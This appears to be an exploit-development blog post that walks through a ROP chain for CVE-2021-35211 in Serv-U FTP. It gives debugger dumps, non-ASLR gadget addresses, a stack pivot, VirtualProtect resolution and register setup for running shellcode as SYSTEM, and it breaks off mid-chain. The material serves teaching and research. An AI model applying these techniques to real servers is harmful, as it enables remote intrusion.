
Creating an Exploit: SolarWinds Vulnerability CVE-2021-35211




As part of our work on the Cosmos platform (formerly known as CAST) we sometimes have a requirement to weaponize vulnerabilities in order to achieve specific customer requirements. In this case we were asked "can you guys write an exploit for this?" and we were happy to oblige.

The Vulnerability

In this blog post, I'd like to share some of the thought process behind creating a ROP-based exploit for Serv-U FTP v15.2.3.717 on modern Windows systems. I'm not going to cover the root cause of the vulnerability here because the Microsoft research team did a good job of it in their blog post. Please read that article first and then come back here if you're interested in how we arrived at the point of NattiSamson's PoC and our subsequent exploit.

We pick up at the point where NattiSamson's PoC gives us a semi-reliable way to populate the r9 register with an attacker-supplied value that is subsequently used by a call r9 instruction. This gives us a way to control rip and theoretically execute arbitrary code in the context of Serv-U, which typically runs as a service as NT AUTHORITY\SYSTEM.

We'll keep the tooling simple. If you want to play along you'll need:

  • A disassembler. In this example I used Hopper Disassembler, but IDA Pro, Ghidra, or anything else will do.
  • Radare2. The Swiss army knife of assembly language! Get it from the Radare2 website.
  • WinDBG. I used WinDBG on Windows Server 2022 Datacenter; you can get it here.
  • Proof-of-Concept code. The exploit I wrote is based on the PoC written by NattiSamson. The original code is here: PoC.
  • Serv-U FTP v15.2.3.717. Download it from the Serv-U Download page.
  • Python 3. Python 2 will probably work with some tweaks.
Note that I am not using Mona or other such tools to automate the exploit development process. I'm doing a lot of this manually to better demonstrate the steps involved in writing ROP exploits; perhaps in a later blog post I'll go over how to do this with automation tooling like Mona.

    If you don't care about the technical details and just want to grab the exploit, it's available here.

    Summarizing the Exploit Development

    I started with NattiSamson's PoC that triggered the bug in Serv-U and placed a user-controllable value into rip via a call r9 instruction. r9 is a QWORD (8-byte / 64-bit) register, the contents of which can be controlled by passing a carefully constructed malicious payload during the initial SSH cryptographic handshake with Serv-U.

    Let's break the exploit development down into chunks. This will be a ROP exploit and loosely gets constructed like so:

    1. Figure out what address to put into r9 in order to kickstart code execution
    2. Defeat ASLR to enable the above
    3. Pivot the stack pointer rsp to point at the ROP chain in our payload
    4. Find the address of the function kernel32.dll!VirtualProtect, which I'll use to make the stack executable (RWX)
    5. Identify useful ROP gadgets to do (4)
    6. Build a ROP chain that calls VirtualProtect to change the stack's page protection from RW- to RWX
    7. Reset the stack/registers to pre-exploit values (if necessary and feasible)
    8. Add ROP gadgets to jump to shellcode on the newly executable stack

    I may or may not stick to that order!

    Where to Jump? ASLR? Stack Pivot?

    The first three points above are all intertwined, so I'll deal with them at the same time. The question is: What memory address should I put into r9 in order to kickstart our ROP chain exploit? I must solve for:

    • The stack pointer rsp must point to our ROP chain before the call r9 returns with a ret instruction. This is because of the way ret works. Think of the ret instruction as an equivalent of pop rax ; jmp rax or more simply, pop rip, both of which pop a 64-bit address off the stack and jump to it. If you control the stack, you control the return address of every ret instruction in the future.
    • In other words: if rsp doesn't point to our ROP chain by the time ret is called, I'm hosed.
    • Unfortunately, rsp does not point to our ROP chain at the time of the PoC's call r9, so our first ROP gadget must populate rsp with the address of our payload/ROP chain buffer and then call ret.
    • Due to ASLR, most memory addresses will be different every time Serv-U is launched. I must find static addresses, at least until I get a proper foothold to query the runtime dynamically.
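The "ret is really pop rip" idea from the list above can be illustrated with a toy model. This is only a sketch: the "stack" is a Python list, the gadget addresses 0x1000 and 0x2000 are made up for illustration, and each gadget is modelled as a function that may consume further values from the stack before the next ret.

```python
def run_chain(stack, gadgets):
    """Simulate a chain of ret instructions: pop an address, run that gadget, repeat."""
    trace = []
    while stack:
        rip = stack.pop(0)                 # ret behaves like "pop rip"
        trace.append(gadgets[rip](stack))  # the gadget may pop its own operands
    return trace


# Hypothetical gadget addresses, for illustration only.
GADGETS = {
    0x1000: lambda stack: "pop rcx -> 0x%x" % stack.pop(0),
    0x2000: lambda stack: "pop rdx -> 0x%x" % stack.pop(0),
}

# Whoever controls the stack contents controls every address that ret jumps to.
chain = [0x1000, 0xDEAD, 0x2000, 0xBEEF]
trace = run_chain(list(chain), GADGETS)
print(trace)
```

The point of the model is simply that the values placed on the stack decide both which gadget runs next and which operands it receives.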

    Whew. Tricksy. Fortunately, the stars aligned on this bug and it's pretty easy to work around these problems. First up: ASLR. I can't do anything until I've worked around address space randomization.


    I can't pivot the stack or reliably jump to a useful instruction until I've found predictable, repeatable addresses that aren't subject to ASLR.

    The first thing to do is see if Serv-U.exe or any of the bundled DLLs are compiled without ASLR support. The tool for the job is NetSPI's PESecurity, a PowerShell script that scans executable files for security flags and produces a concise report, like so:

    PS C:\Users\Administrator\Desktop> Import-Module .\Get-PESecurity.psm1
    PS C:\Users\Administrator\Desktop> Get-PESecurity -directory 'C:\Program Files\RhinoSoft\Serv-U' -recursive
    FileName         : C:\Program Files\RhinoSoft\Serv-U\RhinoNET.dll
    ARCH             : AMD64
    DotNET           : False
    ASLR             : False
    DEP              : True
    Authenticode     : False
    StrongNaming     : N/A
    SafeSEH          : N/A
    ControlFlowGuard : False
    HighentropyVA    : True
    FileName         : C:\Program Files\RhinoSoft\Serv-U\RhinoRES.dll
    ARCH             : AMD64
    DotNET           : False
    ASLR             : False
    DEP              : True
    Authenticode     : False
    StrongNaming     : N/A
    SafeSEH          : N/A
    ControlFlowGuard : False
    HighentropyVA    : True
    FileName         : C:\Program Files\RhinoSoft\Serv-U\Serv-U-RES.dll
    ARCH             : AMD64
    DotNET           : False
    ASLR             : False
    DEP              : True
    Authenticode     : False
    StrongNaming     : N/A
    SafeSEH          : N/A
    ControlFlowGuard : False
    HighentropyVA    : True
    FileName         : C:\Program Files\RhinoSoft\Serv-U\Serv-U-Setup.exe
    ARCH             : AMD64
    DotNET           : False
    ASLR             : False
    DEP              : True
    Authenticode     : True
    StrongNaming     : N/A
    SafeSEH          : N/A
    ControlFlowGuard : False
    HighentropyVA    : True
    FileName         : C:\Program Files\RhinoSoft\Serv-U\Serv-U-Tray.exe
    ARCH             : AMD64
    DotNET           : False
    ASLR             : False
    DEP              : True
    Authenticode     : True
    StrongNaming     : N/A
    SafeSEH          : N/A
    ControlFlowGuard : False
    HighentropyVA    : True
    FileName         : C:\Program Files\RhinoSoft\Serv-U\Serv-U.dll
    ARCH             : AMD64
    DotNET           : False
    ASLR             : False
    DEP              : True
    Authenticode     : False
    StrongNaming     : N/A
    SafeSEH          : N/A
    ControlFlowGuard : False
    HighentropyVA    : True
    FileName         : C:\Program Files\RhinoSoft\Serv-U\zlib1.dll
    ARCH             : AMD64
    DotNET           : False
    ASLR             : False
    DEP              : True
    Authenticode     : False
    StrongNaming     : N/A
    SafeSEH          : N/A
    ControlFlowGuard : False
    HighentropyVA    : True

    Holy smokes, that's a lot of non-ASLR binaries! For shame, SolarWinds. This means that Serv-U.dll, etc. will always be loaded into the same memory addresses, which means that I have reliable addresses from which to harvest ROP gadgets.
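For readers without PowerShell to hand, the ASLR flag reported above can also be read straight from the PE header. The sketch below is not how PESecurity works internally; it only assumes the standard PE layout, in which the 16-bit DllCharacteristics field sits 70 bytes into the optional header and bit 0x0040 (DYNAMIC_BASE) marks ASLR support. The make_fake_pe helper is a hypothetical stand-in that builds a minimal header for demonstration.

```python
import struct

IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040  # image opts in to ASLR
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100     # image opts in to DEP


def dll_characteristics(pe_bytes):
    """Return the DllCharacteristics field of a PE image held in memory."""
    if pe_bytes[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe_bytes, 0x3C)[0]
    if pe_bytes[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    optional_header = e_lfanew + 4 + 20   # skip signature and COFF file header
    return struct.unpack_from("<H", pe_bytes, optional_header + 70)[0]


def supports_aslr(pe_bytes):
    return bool(dll_characteristics(pe_bytes) & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)


def make_fake_pe(flags):
    """Hypothetical helper: a minimal synthetic header, just enough to parse."""
    image = bytearray(0x200)
    image[:2] = b"MZ"
    struct.pack_into("<I", image, 0x3C, 0x80)
    image[0x80:0x84] = b"PE\x00\x00"
    struct.pack_into("<H", image, 0x80 + 24 + 70, flags)
    return bytes(image)


print(supports_aslr(make_fake_pe(0x0100)))  # DEP only, like the Serv-U binaries above
print(supports_aslr(make_fake_pe(0x0140)))  # DEP plus DYNAMIC_BASE
```

To check a real file, read it with open(path, "rb").read() and pass the bytes to supports_aslr.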

    Stack Pivot

    As mentioned before, the stack pointer rsp doesn't point to our exploit payload buffer at the time call r9 happens. This breaks everything because once the r9 function calls ret the CPU will pop the return address off the stack at the address in rsp and jmp to it. In other words, execution resumes as normal. I can control r9 and therefore control where the call jumps to, but I can't control where it returns to; I have to find a way to point rsp at our payload and return to our ROP chain using only a single ROP gadget.

    It turns out that our payload is actually stored at the address stored in rbp. How do I know that? By examining the registers and the stack in a debugger at the point call r9 is executed by the CPU.

    First the registers:

    0:008> r
    00 0000000d`09bfebf0 00000000`72111cb8     LIBEAY32!CRYPTO_ctr128_encrypt+0xc6
    rax=0000000000000010 rbx=000001ed4d497f00 rcx=000001ed4d9126b8
    rdx=000001ed4d9126c8 rsi=ffffffffffb627a8 rdi=0000000000000000
    rip=00000000720b9636 rsp=0000000d09bfebf0 rbp=000001ed4d5a410a
     r8=000001ed4d497f00  r9=4141414141414100 r10=000001ed4d497f00
    r11=000001ed4d5a40fa r12=000001ed4d9126c8 r13=0000000000000001
    r14=ffffffffffc91a32 r15=000001ed4d474e80
    iopl=0         nv up ei pl nz na po nc
    cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
    00000000`720b9636 41ffd1          call    r9 {41414141`41414141}

    We can see that the stack pointer and base pointer are nowhere near each other:

    rsp = 0x00d09bfebf0
    rbp = 0x1ed4d5a410a

    There was nothing of our payload at rsp's memory address, but what about rbp?

    0:013> db @rbp l128
    00000253`5badfa9a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000253`5badfaaa  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000253`5badfaba  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000253`5badfaca  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000253`5badfada  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000253`5badfaea  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000253`5badfafa  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000253`5badfb0a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000253`5badfb1a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000253`5badfb2a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000253`5badfb3a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000253`5badfb4a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000253`5badfb5a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000253`5badfb6a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000253`5badfb7a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000253`5badfb8a  41 41 41 41 41 41 41 41-00 00 00 00 00 00 00 00  AAAAAAAA........
    00000253`5badfb9a  00 00 00 00 00 00 00 00-00 00 00 00 00 00 73 92  ..............s.
    00000253`5badfbaa  bf a1 35 03 00 90 b8 34-5a 90 ff 7f 00 00 70 34  ..5....4Z.....p4
    00000253`5badfbba  5a 90 ff 7f 00 00 00 22                          Z......"

    Bingo! So the first order of business is to move the address in rbp to rsp. To do that I need a ROP gadget that does something like:

    mov rsp, rbp

    It's rarely that easy, but that's where we start. Using Radare2 to search for ROP gadgets is simple, particularly on architectures like Intel x64 that use variable-length instructions with no alignment requirement for code. Execution can begin at any byte, which helps us find gadgets that aren't even part of the compiled code. It's a cool concept; check it out. Consider the following code:

    0x18005d485               498be3  mov rsp, r11
    0x18005d488                   5d  pop rbp
    0x18005d489                   c3  ret

    The first instruction, mov rsp, r11, takes up three bytes \x49\x8b\xe3 and starts at address 0x18005d485. Therefore, the next instruction is at an address 3 bytes higher at 0x18005d488.

    But what if I set the instruction pointer to address 0x18005d486, which is between the two "valid" instruction addresses? The opcodes would be \x8b\xe3\x5d\xc3, which is a completely different set of instructions. You can use Radare2 to disassemble these opcodes like so:

    % rasm2 -a x86 -b 64 -d 8be35dc3
    mov esp, ebx
    pop rbp
    ret

    Well, look at that! A completely different gadget. You can ask Radare2 to perform gadget searches byte by byte to uncover all possible permutations of instructions by using the "/ad/a " command like this:

    % r2 Serv-U.dll
     -- Ask not what r2 can do for you - ask what you can do for r2
    [0x1801a4184]> "/ad/a mov rsp;ret;"

    The above command "/ad/a mov rsp;ret;" tells Radare2 to scan the Serv-U.dll file for instructions that match a mov followed by a ret, and in which the mov instruction is writing something to the rsp register. The stacked query terms are separated by semicolons and are expected to be regexes; the entire command must be inside double quotes.

    Sadly for us, the above Radare2 search returned no results. Ok, let's try to find a gadget that has some kind of mov rsp, .*, then any other instruction, and then a ret:

    [0x1801a4184]> "/ad/a mov rsp;.*;ret;"
    0x180059ffb               498be3  mov rsp, r11
    0x180059ffe                   5d  pop rbp
    0x180059fff                   c3  ret
    0x18005d485               498be3  mov rsp, r11
    0x18005d488                   5d  pop rbp
    0x18005d489                   c3  ret
    0x18005d986               498be3  mov rsp, r11
    0x18005d989                   5d  pop rbp
    0x18005d98a                   c3  ret
    0x18005fa9a               498be3  mov rsp, r11
    0x18005fa9d                 415e  pop r14
    0x18005fa9f                   c3  ret
    0x180063a5a               498be3  mov rsp, r11
    0x180063a5d                   5f  pop rdi
    0x180063a5e                   c3  ret
    0x180064795               498be3  mov rsp, r11
    0x180064798                   5f  pop rdi
    0x180064799                   c3  ret
    ...omitted for brevity...
    0x180196569               498be3  mov rsp, r11
    0x18019656c                   5f  pop rdi
    0x18019656d                   c3  ret
    0x1801a167f               498be3  mov rsp, r11
    0x1801a1682                   5f  pop rdi
    0x1801a1683                   c3  ret

    That's a LOT of matching gadgets! Remember, I want to put the address of our payload into rsp. Let's rule out any gadgets where rbp is popped off the stack; I’d like to avoid messing with more stack registers than absolutely necessary. I don't care if rdi gets messed up, so those gadgets could be useful so long as r11 points to the location of our payload buffer on the stack.
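The byte-by-byte search idea can be approximated without a disassembler. The following is a rough sketch, not a replacement for Radare2: it looks for the raw bytes of mov rsp, r11 (49 8b e3), followed by one or two arbitrary bytes and a ret (c3), at every offset in a buffer. The sample buffer and the base address 0x180001000 are made up for illustration, and any hit would still need to be disassembled to confirm that the filler bytes form a harmless instruction.

```python
import re

# mov rsp, r11 (49 8b e3), then one or two arbitrary bytes, then ret (c3).
# The lookahead lets matches start at every byte offset, aligned or not.
PIVOT_PATTERN = re.compile(rb"(?=(\x49\x8b\xe3.{1,2}?\xc3))", re.DOTALL)


def find_pivot_candidates(code, base=0):
    """Return (address, hex bytes) for each candidate stack-pivot gadget."""
    return [(base + m.start(), m.group(1).hex()) for m in PIVOT_PATTERN.finditer(code)]


# Synthetic sample: nop, "mov rsp, r11; pop rbp; ret", nop, "mov rsp, r11; pop r14; ret"
sample = bytes.fromhex("90" "498be35dc3" "90" "498be3415ec3")
hits = find_pivot_candidates(sample, base=0x180001000)
for address, raw in hits:
    print(hex(address), raw)
```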

    To check r11's value I used WinDBG to attach to the Serv-U process and compare the value of rbp against r11 at the time call r9 is executed by the exploit:

    (1c60.1c04): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    00000000`720b9636 41ffd1          call    r9 {41414141`41414141}
    0:013> r
    rax=0000000000000010 rbx=0000020058925d20 rcx=0000020058d1d688
    rdx=0000020058d1d698 rsi=ffffffffffb5ee68 rdi=0000000000000000
    rip=00000000720b9636 rsp=0000009dd2aff320 rbp=0000020058648b3a
     r8=0000020058925d20  r9=4141414141414141 r10=0000020058925d20
    r11=0000020058648b2a r12=0000020058d1d698 r13=0000000000000001
    r14=ffffffffff92b492 r15=000002005887c510
    iopl=0         nv up ei pl nz na po nc
    cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
    00000000`720b9636 41ffd1          call    r9 {41414141`41414141}

    We can see that:

    rbp = 0x20058648b3a
    r11 = 0x20058648b2a

    What good fortune! The r11 register points at an address just 16 bytes away from rbp (0x10 lower), which points exactly at our payload buffer. I can use the newly identified ROP gadget to perform the stack pivot, pop eight bytes off the "stack" (which is really our payload) into rdi, and then pop the next eight bytes off the stack into rip; given that I control the new stack, I therefore control the value of rip, which means I now have a means to pivot the stack and continue execution from our ROP chain.

    I chose the gadget address of 0x18010391a from those found by Radare2. It became the value placed into the payload buffer as our first ROP gadget address.
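As a quick sanity check, the distance between rbp and r11 can be compared across the two debugger sessions shown earlier. The register values below are copied from those dumps; the only assumption is that two samples are enough to suggest the offset is stable.

```python
# Register values taken from the two WinDBG register dumps above.
RUNS = [
    {"rbp": 0x000001ED4D5A410A, "r11": 0x000001ED4D5A40FA},
    {"rbp": 0x0000020058648B3A, "r11": 0x0000020058648B2A},
]

deltas = [run["rbp"] - run["r11"] for run in RUNS]
print([hex(d) for d in deltas])
```

The absolute heap addresses differ between runs, but the relative offset is the same in both, which is what makes a gadget based on r11 usable.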

    Executing Shellcode: Find kernel32!VirtualProtect

    Now that I've pivoted the stack to our ROP buffer, I need to set up the conditions for executing shellcode. Step one: Make the memory pages in which our shellcode is stored readable, writable, and - most importantly - executable. Our shellcode is on the stack in our payload buffer, so that's what I need to make executable.

    The function VirtualProtect is used to change the protection flags for regions of memory, which lets us set the stack to executable (RWX). I checked the import table of Serv-U.dll, but it didn't import VirtualProtect, so the easiest way of getting the correct address (direct reference) wouldn't work. Instead I have to use native Windows functions to derive the address by calling the equivalent of GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "VirtualProtect").

    We can see from the disassembler's import tables (Navigation / Imported Symbols in Hopper) that Serv-U.dll imports GetModuleHandleW from kernel32.dll:

    View of the disassembler's import tables

    It also imports GetProcAddress:

    View of the disassembler's import table with GetProcAddress

    The address 0x1801c92c8 is a trampoline stub built into Serv-U.dll that, when jumped to, redirects execution to the real kernel32!GetModuleHandleW that's been mapped into Serv-U's process space by the operating system's library loader. The same applies for 0x1801c9590 and kernel32!GetProcAddress. In other words, the value stored at address 0x1801c92c8 is a pointer to the real GetModuleHandleW function.

    Let's dereference it in the debugger and double-check that it matches the real address of GetModuleHandleW in this context. First, dereference the trampoline in Serv-U.dll:

    0:026> u poi(0x1801c92c8)
    00007ffd`19e4ce40 48ff2559370600  jmp     qword ptr [KERNEL32!_imp_GetModuleHandleW (00007ffd`19eb05a0)]
    00007ffd`19e4ce47 cc              int     3

    Awesome. Does the same apply to GetProcAddress?

    0:026> u poi(0x1801c9590)
    00007ffd`19e4a780 4c8b0424        mov     r8,qword ptr [rsp]
    00007ffd`19e4a784 48ff25bd510600  jmp     qword ptr [KERNEL32!_imp_GetProcAddressForCaller (00007ffd`19eaf948)]
    00007ffd`19e4a78b cc              int     3

    Yes indeed! That has saved us a lot of hassle and I can write the ROP chain the "easy" way by calling known pointers to access the functions needed to locate VirtualProtect. In order to call the necessary functions I'll need to find some ROP gadgets that provide the necessary functionality.

    Identify ROP gadgets

    I started by sketching out a rough plan of what I wanted to achieve.

    • Stack pivot
    • Set up the parameter needed when calling moduleHandle = GetModuleHandleW(L"kernel32.dll")
    • Call it
    • Set up the two parameters needed when calling VirtualProtect = GetProcAddress(moduleHandle, "VirtualProtect")
    • Call it
    • Set up the four parameters required for VirtualProtect(stackAddress, size, attributes, &results)
    • Call it
    • Load the address of our payload buffer's NOP sled + shellcode
    • Restore the pre-exploit stack frame
    • Jump to the shellcode

    It takes a bit of trial and error to build up the gadget chain because we're often limited to less-than-perfect gadgets. So I spent some time finding useful gadgetry. What constitutes "useful"? Here are a few ideas:

    • Simple and short. E.g. mov rax, rbx ; ret is much better than mov rax, rbx; mov rax, qword ptr [rax+10h]; pop rcx; ret because the latter stomps on the values we want and it also messes with the stack due to the pop instruction. Simple is good in ROP. But if we can't find "perfect" gadgets (i.e. those that perform only the desired operation and a ret) then we have to settle for gadgets with extra baggage.
    • Manipulation of argument-passing registers on x64. Gadgets that allow us to pop values off the stack into the four argument-passing registers (rcx, rdx, r8, and r9, respectively) are super useful for calling into functions. So for example these gadgets are solid gold:
      • pop rcx ; ret
      • pop rdx ; ret
      • pop r8 ; ret
      • pop r9 ; ret
    • In this exploit there was no pop r9 gadget available. Instead, I looked for the smallest possible non-perfect gadgets to load another register with the desired value and swap it into the r9 register, like so:
      • pop rax ; xchg r9, rax ; ret
    • Flow control gadgets like jmp rax ; ret or call rbx ; ret can be chained together like so:
      • pop rax followed by
      • jmp rax or jmp qword ptr [rax]
    • Gadgets that dereference the registers are super useful when bouncing off trampolines like the ones I have for GetModuleHandleW and GetProcAddress. For example:
      • mov rax, qword ptr [rax]. Reads the value at the memory address in rax and stores it in the rax register.
      • For example, if rax=0x123456789 then the above instruction reads the 8 bytes at memory address 0x123456789 and stores that value in the rax register.

    I spent some time collecting gadgets and then used them to construct a real ROP chain. Sometimes it doesn't work out and you need to spend forever thinking up alternative ways of doing the job. For example, I spent hours trying to find an easy way to put arbitrary values in the r9 register when calling into VirtualProtect. Eventually I settled on a two-gadget chain that populated r9 via rax, like so:

    # Gadget 1
    pop rax         # we control the stack, so we can control the value popped into rax
    # Gadget 2
    xchg rax, r9    # tadaaaa
    adc al, 0       # Effectively a NOP without consequences
    add rsp, 0x38   # Effectively a NOP with consequences: stack pointer increases by 0x38 bytes.
    ret             # The address popped off the stack by the ret instruction needs to be 0x38 bytes further up our payload/stack than it normally would be.

    The double-gadget was a compromise because I really didn't want to have 0x38 bytes of my payload eaten up by add rsp, 0x38, but it did the job and was the best I had, so I went with it.

    Call GetModuleHandleW

    The GetModuleHandleW function is defined as:

    HMODULE GetModuleHandleW(
      [in, optional] LPCWSTR lpModuleName
    );

    It returns a pointer (aka "handle" in Microsoft terminology) that identifies the module (DLL, executable, etc.) in memory. The pointer literally points to a complete DLL in memory if it's loaded. The name of the module must be specified as a "wide" string, which uses 16 bits per character instead of ASCII's eight bits per character. For example:

    ASCII String:

    "kernel32" = \x6b\x65\x72\x6e\x65\x6c\x33\x32

    Wide String:

    "kernel32" = \x6b\x00\x65\x00\x72\x00\x6e\x00\x65\x00\x6c\x00\x33\x00\x32\x00

    Handily enough, there is a wide string version of kernel32 in the Serv-U.dll binary! It's located at 0x180313230, as shown here in Hopper:

    wide string version of kernel32 in the Serv-U.dll binary shown here in Hopper.

    Note that it's denoted as type dw, which is a wide string. Checking the result in the hex editor confirms that this is really a wide string:

    Result in the hex editor showing as a really wide string
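The two encodings of the module name are easy to reproduce in Python, which is handy when hunting for a wide string in a hex editor. This is a small illustrative sketch; it assumes the wide form is UTF-16 little-endian, which is what the byte sequence shown earlier corresponds to.

```python
name = "kernel32"

ascii_bytes = name.encode("ascii")      # one byte per character
wide_bytes = name.encode("utf-16-le")   # two bytes per character, low byte first

print(ascii_bytes.hex())
print(wide_bytes.hex())
```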

    Excellent. All it takes to call GetModuleHandleW(L"kernel32.dll") is the following pseudo-code:

    pop rcx         # We place the value 0x180313230 (address of kernel32 string) on the stack to be popped into rcx
    pop rax         # We place the value 0x1801c92c8 (address of GetModuleHandleW trampoline) on the stack to be popped into rax
    jmp [rax]       # Dereference rax and jump to the resulting address, which is the real address of GetModuleHandleW
    mov rcx, rax    # Save the returned handle in rcx for later

    The handle for kernel32.dll is returned in the rax register, which we can save for later use. In the exploit I save it into a writable area of memory in Serv-U's .data segment that I treat as a scratchpad for "variables" that hold data temporarily.

    Call GetProcAddress

    The GetProcAddress function is defined as:

    FARPROC GetProcAddress(
      [in] HMODULE hModule,
      [in] LPCSTR  lpProcName
    );

    The first parameter is the handle I obtained from GetModuleHandleW. The second is the name of the function I want to find: VirtualProtect. This time the string is expected to be ASCII, not wide. Unfortunately, there is no NULL-terminated "VirtualProtect" string in the Serv-U binaries, so I need to create my own using the stack.

    The first step is to find a writable memory address in Serv-U's .data segment to which I can write a string. I used Hopper to look through the data segment for a section that was not cross-referenced to any code; the assumption is that the memory area is truly unused. Pseudo-code is as follows:

    # Write "VirtualProtect\x00\x00" (16 bytes) to an unused address in .data
    # Split the task so that two 8-byte chunks are written consecutively.
    pop rdx         # An unused address in Serv-U's data segment gets popped into rdx. 
    pop rax         # Pop the value 0x506c617574726956 ("VirtualP" little-endian) off the stack.
    mov [rdx], rax  # Write "VirtualP" to the first 8 bytes of our .data memory chunk.
    pop rdx         # Pop the address of the next 8 bytes of .data memory into rdx. 
    pop rax         # Pop "rotect\x00\x00" off the stack into the rax register.
    mov [rdx], rax  # Append "rotect\x00\x00" to our memory chunk, making a complete "VirtualProtect\x00\x00" string.
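The 8-byte values popped into rax above can be derived rather than worked out by hand. The sketch below uses a hypothetical helper, to_qwords, that NUL-terminates an ASCII string, pads it to a multiple of eight bytes, and returns the little-endian 64-bit values to place on the stack.

```python
import struct


def to_qwords(name):
    """Split a NUL-terminated ASCII string into little-endian 64-bit integers."""
    raw = name.encode("ascii") + b"\x00"
    raw += b"\x00" * (-len(raw) % 8)    # pad to a multiple of 8 bytes
    return [struct.unpack_from("<Q", raw, i)[0] for i in range(0, len(raw), 8)]


qwords = to_qwords("VirtualProtect")
print([hex(q) for q in qwords])
```

The first value matches the 0x506c617574726956 constant in the pseudo-code; the second carries "rotect" plus two NUL bytes.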

    Now I can call GetProcAddress:

    # Assume rcx contains the value returned by GetModuleHandleW, the handle to kernel32.dll
    # Assume rdx contains the address of the string "VirtualProtect\x00"
    pop rax         # Pop 0x1801c9590 off the stack (the address of the GetProcAddress trampoline)
    jmp [rax]       # Jump to GetProcAddress(handle, "VirtualProtect\x00")
    # The address of the VirtualProtect function is returned in rax

    Phew! I now have the address of VirtualProtect in rax.

    Calling VirtualProtect

    The VirtualProtect function is defined as:

    BOOL VirtualProtect(
      [in]  LPVOID lpAddress,       # Starting address of memory to make executable (rounded down to nearest 4k page boundary).
      [in]  SIZE_T dwSize,          # Number of bytes to make executable (rounded up to nearest 4k page boundary).
      [in]  DWORD  flNewProtect,    # Protection flags. In this case 0x40 = RWX.
      [out] PDWORD lpflOldProtect   # Return results in this variable. Must be a writable memory address!
    );

    Remember that the parameters are passed to this function in the rcx, rdx, r8, and r9 registers, respectively. In this case:

    rcx = Address of our payload buffer (i.e. the current stack address)
    rdx = 0x2000 (8kB or two 4k memory pages)
    r8  = 0x40 (readable, writable, executable)
    r9  = Address from .data segment of Serv-U
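The rounding mentioned in the function definition can be worked through numerically. This sketch assumes 4 KiB pages and the documented behaviour that every page containing at least one byte of the requested range is affected; the sample address is the rbp value from one of the earlier register dumps, used purely as an example.

```python
PAGE_SIZE = 0x1000
PAGE_EXECUTE_READWRITE = 0x40   # the flNewProtect value used in this exploit


def affected_range(address, size):
    """Return (start, end) of the page-aligned region covering [address, address + size)."""
    start = address & ~(PAGE_SIZE - 1)                               # round down
    end = (address + size + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1)        # round up
    return start, end


start, end = affected_range(0x20058648B3A, 0x2000)
pages = (end - start) // PAGE_SIZE
print(hex(start), hex(end), pages)
```

Because the buffer address is not page-aligned, a 0x2000-byte request can touch three pages rather than two, which only makes more of the buffer executable.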

    The second and third parameters are dead easy: Just pop them off the stack!

    pop rdx         # Pop 0x2000 off the stack
    pop r8          # Pop 0x40 off the stack

    Getting the last argument is slightly trickier because we have no pop r9 gadget to work with; instead the compound gadget is used:

    # 1st gadget
    pop rax         # Pop writable address off the stack into rax
    # 2nd gadget
    xchg rax, r9    # Swap rax and r9 so that r9 now contains the writable address
    adc al, 0       # Extra crap instruction does effectively no operation
    add rsp, 0x38   # This part of the gadget moves the stack pointer up 0x38 bytes. 
                    # We account for this in our exploit by skipping 0x38 bytes of our 
                    # payload buffer before writing the next value to the buffer.
    ret             # Return to the next gadget
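Accounting for the add rsp, 0x38 side effect when laying out the payload might look like the sketch below. All four addresses are hypothetical placeholders, not the values from the real exploit; the point is only the 0x38 bytes of filler between the compound gadget and whatever comes next.

```python
import struct

# Hypothetical addresses, for illustration only.
POP_RAX = 0x180001111       # pop rax ; ret
XCHG_RAX_R9 = 0x180002222   # xchg rax, r9 ; adc al, 0 ; add rsp, 0x38 ; ret
NEXT_GADGET = 0x180003333   # whatever gadget should run afterwards
SCRATCH = 0x180400000       # a writable address for lpflOldProtect


def q(value):
    """Pack a 64-bit little-endian value for the ROP chain."""
    return struct.pack("<Q", value)


chain = b"".join([
    q(POP_RAX), q(SCRATCH),   # rax = writable address
    q(XCHG_RAX_R9),           # r9 = rax, then rsp += 0x38
    b"\x90" * 0x38,           # filler skipped over by add rsp, 0x38
    q(NEXT_GADGET),           # the ret lands here
])
print(len(chain), chain[0x50:0x58].hex())
```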

    Finally I populate the first parameter: the address of our stack. The gadgets aren't perfect for this operation, but they work:

    # 1st gadget
    push rbp                # Push an address near our stack onto the head of the stack.
    pop rax                 # Pop the address off the stack into rax so that rax now contains the address of the stack.
    add byte ptr [rax], al  # Effective no operation in this context
    ret                     # Return to next gadget
    # 2nd gadget
    mov rcx, rax            # Put the (approximate) address of the stack into rcx

